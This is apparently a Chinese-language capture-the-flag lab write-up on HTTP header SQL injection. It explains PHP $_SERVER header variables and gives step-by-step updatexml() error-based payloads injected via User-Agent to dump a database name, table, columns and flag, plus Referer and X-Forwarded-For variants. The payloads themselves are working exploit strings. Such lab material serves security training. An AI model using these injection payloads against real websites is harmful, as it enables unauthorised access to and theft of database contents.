head注入zkaq

1.概念

Head注入&＃xff1a;当网站请求中的head信息与数据库有交互的情况下&＃xff0c;就可以尝试head注入

常见的超全局变量&＃xff1a;

• $_REQUEST &＃xff08;获取GET/POST/COOKIE&＃xff09; COOKIE在新版本已经无法获取了
• $_POST &＃xff08;获取POST传参&＃xff09;
• $_GET (获取GET的传参)
• $_COOKIE &＃xff08;获取COOKIE的值&＃xff09;
• $_SERVER &＃xff08;包含了诸如头信息(header)、路径(path)、以及脚本位置(script locations)等等信息的数组&＃xff09;

$_SERVER常见的用法&＃xff1a;

• $_SERVER[‘HTTP_REFERER’] 获取Referer请求头数据
• $_SERVER[“HTTP_USER_AGENT”] 获取用户相关信息&＃xff0c;包括用户浏览器、操作系统等信息。
• $_SERVER[“REMOTE_ADDR”] 浏览网页的用户ip。

2.靶场

1.pass-07—Head注入&＃xff08;一&＃xff09;

• 查看源码&＃xff0c;发现源码已经对入参特殊字符做了过滤

• 发现源代码中head中的USER_AGENT与数据库有交互&＃xff0c;尝试从USER_AGENT入手尝试
• 先用burp爆破&＃xff0c;获取用户名及密码 admin/123456

• 使用USER_AGENT注入获取数据库名: ’ or updatexml(1,concat(‘!’,database()),1),1) – wq
• updatexml() :更新xml文档的函数

语法&＃xff1a;updatexml(目标xml内容&＃xff0c;xml文档路径&＃xff0c;更新的内容)

得到数据库名head_error

• 获取表名 &＃xff1a;’ or updatexml(1,concat(‘!’,(select table_name from information_schema.tables where table_schema&＃61;‘head_error’ limit 0,1)),1),1) – qwe

得到表名&＃xff1a;flag_head

• 查询字段名 &＃xff1a; ’ or updatexml(1,concat(‘!’,(select column_name from information_schema.columns where table_name&＃61;‘flag_head’ limit 0,1)),1),1) – qwe

得到两个字段名&＃xff1a;Id flag_h1

• 查询表中数据 &＃xff1a; ’ or updatexml(1,concat(‘!’,(select flag_h1 from flag_head limit 0,1)),1),1) — qwe

拿到flag

2.pass-08—Head注入&＃xff08;二&＃xff09;

• 查看源代码

同上一题一样&＃xff0c;修改head的refer进行测试即可

3.pass-09 —head注入&＃xff08;三&＃xff09;

• 查看源代码

同上题一样&＃xff0c;修改head的X_FORWARDED_FOR进行测试即可